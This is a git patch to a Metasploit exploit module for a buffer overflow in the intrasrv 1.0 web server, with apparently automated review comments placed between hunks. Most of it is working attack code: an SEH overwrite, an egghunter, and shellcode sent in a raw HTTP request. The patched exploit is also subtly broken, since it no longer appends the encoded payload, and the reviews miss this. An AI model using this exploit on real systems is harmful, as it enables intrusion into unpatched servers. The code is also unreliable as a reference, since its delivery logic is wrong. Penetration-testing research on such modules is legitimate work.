From 28f030494e3cb21b608c508bc47f59feb473c46d Mon Sep 17 00:00:00 2001
From: Nathan Einwechter
Date: Mon, 12 Aug 2013 15:12:15 -0400
Subject: [PATCH] Use tcp mixin/clean corrupt bytes

---
 modules/exploits/windows/http/intrasrv_bof.rb | 44 +++++++++++--------
 1 file changed, 26 insertions(+), 18 deletions(-)

diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb
index ec77c95bd6..020e83b122 100644
--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -10,7 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Egghunter
 
   def initialize(info={})
@@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Payload' =>
         {
+          'Space' => '4660',
           'StackAdjustment' => -3500,
           'BadChars' => "\x00"
         },
@@ -60,12 +61,16 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => "/"
-    })
+    begin
+      connect
+    rescue
+      print_error("Could not connect to target!")
+      return Exploit::CheckCode::Safe
+    end
+    sock.put("GET / HTTP/1.0\r\n")
+    res = sock.get
 
-    if res and res.headers['Server'] =~ /intrasrv 1.0/
+    if res =~ /intrasrv 1.0/
       return Exploit::CheckCode::Vulnerable
     else
       return Exploit::CheckCode::Safe
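Review bot: Swapping `Msf::Exploit::Remote::HttpClient` for `Msf::Exploit::Remote::Tcp` silently changes the module's options, because the Tcp mixin registers RPORT without a default while HttpClient defaulted it to 80. Unless the module's register_options block (outside this hunk) already declares `Opt::RPORT(80)`, users now have to set the port by hand and `check`/`exploit` will fail on an unset RPORT; please confirm and add `register_options([Opt::RPORT(80)], self.class)` if it is missing. The HttpClient-provided VHOST, SSL and proxy options also disappear with this change, which is worth a line in the commit message.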
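Review bot: The new `'Space' => '4660'` gives the payload space limit as a String, whereas every other Metasploit module (and the neighbouring `'StackAdjustment' => -3500`) uses an Integer. The framework compares Space numerically against the encoded payload length when it generates the payload, so a String there is likely to raise a comparison error rather than enforce the limit; it should read `'Space' => 4660,`.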
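Review bot: The request sent in `check`, `sock.put("GET / HTTP/1.0\r\n")`, is not a complete HTTP request because the header block is never terminated by an empty line, so a conforming server may keep waiting for more headers and `sock.get` returns nothing or times out, which makes the check report Safe against a vulnerable host. Send `sock.put("GET / HTTP/1.0\r\n\r\n")` instead. The socket opened by `connect` is also never closed on the success path; add `disconnect` right after `res = sock.get`, mirroring what `exploit` does. Minor: `/intrasrv 1.0/` leaves the dot unescaped, `/intrasrv 1\.0/` is what the author means.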
@@ -75,27 +80,30 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     # setup egghunter
     hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
-      :checksum => true
+      :checksum=>true, :eggtag=>"w00t"
     })
 
     # setup buffer
-    buf = rand_text(target['Offset']-128) # junk to egghunter
-    buf << make_nops(8) + hunter # nopsled + egghunter at offset-128
+    buf = rand_text(target['Offset']-126) # junk to egghunter at jmp -128
+    buf << hunter # egghunter
     buf << rand_text(target['Offset']-buf.length) # more junk to offset
     buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
     buf << [target.ret].pack("V*") # seh
 
     # Setup payload
-    shellcode = rand_text(50) # pad payload
-    shellcode = egg + egg # attach egg tags
-    shellcode << payload.encoded
+    shellcode = egg
+    # second last byte of payload gets corrupted - pad 2 bytes
+    # so we don't corrupt the actual payload
+    shellcode << rand_text(2)
+
+    msp = pattern_create(20000)
 
     print_status("Sending buffer...")
-    send_request_cgi({
-      'method' => 'GET',
-      'uri' => "/",
-      'vhost' => buf,
-      'data' => shellcode
-    })
+    # Payload location is an issue, so we're using the tcp mixin
+    # instead of HttpClient here to maximize control over what's sent.
+    # (i.e. no additional headers to mess with the stack)
+    connect
+    sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
+    disconnect
   end
 end
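Review bot: `msp = pattern_create(20000)` is assigned and never read anywhere in `exploit`, so it only builds a 20000-byte pattern on every run; it looks like leftover debugging and the line should be removed. Separately, `shellcode = egg` followed by `shellcode << rand_text(2)` appends to the very String object that `egg` still references, because `<<` mutates in place; nothing reads `egg` afterwards today, but the aliasing is a trap for the next edit, and `shellcode = egg + rand_text(2)` expresses the intent without it. The hash literal `:checksum=>true, :eggtag=>"w00t"` also drops the spaces around `=>` that the rest of the module uses.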